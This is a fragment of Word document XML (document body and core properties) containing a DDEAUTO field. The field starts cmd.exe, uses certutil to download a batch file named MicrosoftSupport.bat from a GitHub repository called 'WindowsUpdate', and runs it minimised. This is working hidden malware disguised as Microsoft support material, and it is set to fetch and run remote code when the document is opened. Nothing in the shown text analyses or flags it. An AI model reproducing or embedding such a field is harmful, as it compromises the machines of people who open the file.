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DD" w:rsidRPr="002911DD" w:rsidRDefault="002911DD" w:rsidP="002911D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>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidRPr="002911DD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:instrText>DDEAUTO c:\\Windows\\system32\\cmd.exe "/k certutil.exe -urlcache -split -f https://raw.githubusercontent.com/AlaskaMN/WindowsUpdate/master/MicrosoftSupport.bat 0.bat &amp;&amp; start /min 0.bat"</w:instrText>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="002911DD" w:rsidRPr="0029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11DD"/>
    <w:rsid w:val="0029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6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3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-03-02T18:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-03-02T18:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>